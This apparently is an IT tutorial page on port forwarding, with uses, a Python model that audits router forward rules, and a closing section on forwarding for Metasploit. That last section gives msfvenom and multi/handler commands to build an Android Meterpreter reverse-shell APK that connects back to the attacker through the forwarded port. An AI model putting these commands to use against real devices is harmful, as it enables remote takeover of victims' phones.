What is port forwarding?
If you work in IT as a system administrator, an ethical hacker or even a developer, you will come across an application of network address translation (one of the functions of a router) called port forwarding or port mapping.
Formally, port forwarding is an application of network address translation that redirects a communication request from one address and port combination to another while the packets traverse a network gateway such as a router or firewall.
Let's look at an example to understand it better. Suppose you want to use your computer to provide some sort of service, such as a web service (a software module designed to do certain tasks). The biggest problem is that someone on the internet cannot access the service, because your computer is inside a private network. To present your service to hosts on the internet you need to do port forwarding, as shown in the video: you enter the address of the local host (which has the service) in the IP address block, along with the port you want to forward to receive the connection.
WHY PORT FORWARDING
- Running a public HTTP server within a private LAN
- Permitting secure shell access to a host on the private LAN from the Internet
- Permitting FTP access to a host on a private LAN from the Internet
- Running a publicly available game server within a private LAN
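To make the translation concrete, here is an added example (not from the original page) that models a router's port-forward table in Python: `translate` rewrites the destination of an inbound packet the way the gateway does, and `audit` reviews the table for forwards an administrator should question. The addresses, rule table, approved list and function names are all constructed for illustration.

```python
import ipaddress
from typing import NamedTuple

class Forward(NamedTuple):
    proto: str      # "tcp" or "udp"
    ext_port: int   # port opened on the router's public address
    int_ip: str     # LAN host that receives the traffic
    int_port: int   # port the service listens on

LAN = ipaddress.ip_network("192.168.1.0/24")   # assumed private LAN
PUBLIC_IP = "203.0.113.10"                     # constructed (documentation range)

# Constructed rule table, as it might be read from a router's settings page.
RULES = [
    Forward("tcp", 80, "192.168.1.10", 8080),    # public HTTP server
    Forward("tcp", 2222, "192.168.1.20", 22),    # SSH to a LAN host
    Forward("tcp", 21, "192.168.1.30", 21),      # FTP to a LAN host
    Forward("tcp", 4444, "192.168.1.50", 4444),  # nobody asked for this one
]
APPROVED = set(RULES[:3])   # forwards the administrator signed off on

def translate(rules, packet):
    """Rewrite the destination of an inbound packet the way the router does.
    packet = (proto, src_ip, src_port, dst_ip, dst_port); None means dropped."""
    proto, src_ip, src_port, dst_ip, dst_port = packet
    if dst_ip != PUBLIC_IP:
        return None
    for r in rules:
        if (r.proto, r.ext_port) == (proto, dst_port):
            return (proto, src_ip, src_port, r.int_ip, r.int_port)
    return None   # no forward for this port: nothing on the LAN is reachable

def audit(rules, approved):
    """Return (ext_port, finding) pairs for forwards that need review."""
    findings, seen = [], set()
    for r in rules:
        if (r.proto, r.ext_port) in seen:
            findings.append((r.ext_port, "shadowed by an earlier rule"))
        seen.add((r.proto, r.ext_port))
        if ipaddress.ip_address(r.int_ip) not in LAN:
            findings.append((r.ext_port, "target outside the LAN"))
        if r not in approved:
            findings.append((r.ext_port, "not on the approved list"))
        if r.int_port == 21:
            findings.append((r.ext_port, "FTP is cleartext; prefer SFTP"))
    return findings

if __name__ == "__main__":
    print(translate(RULES, ("tcp", "198.51.100.7", 51000, PUBLIC_IP, 80)))
    for port, finding in audit(RULES, APPROVED):
        print(port, finding)
```

Every forward is a service exposed to the whole internet, so the approved list should be kept as short as the router's rule table.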
PORT FORWARDING FOR METASPLOIT
- Enter the IP address of the Kali Linux machine in the IP address block in the router settings.
- In the payload generation command, use the public address of your internet connection in LHOST and the port you have forwarded in LPORT.
- In Metasploit, using the multi handler exploit with the required payload, set the LHOST option to the local address of the Kali Linux machine and the LPORT option to the port which has been forwarded.
COMMANDS: Example being used (Android Meterpreter)
- msfvenom -p android/meterpreter/reverse_tcp LHOST=<public address> LPORT=<forwarded port> R > name.apk
- In Metasploit:
  - use multi/handler
  - set payload android/meterpreter/reverse_tcp
  - set LHOST <private IP address>
  - set LPORT <forwarded port>
The main concept here is that the payload is configured with the public address of our network and the forwarded port. Any system running that payload will therefore try to make a reverse connection to that IP address and port. The connection request arrives at the router on the forwarded port, and the router passes it to the respective local host, so a connection is established between our Kali machine and the infected system.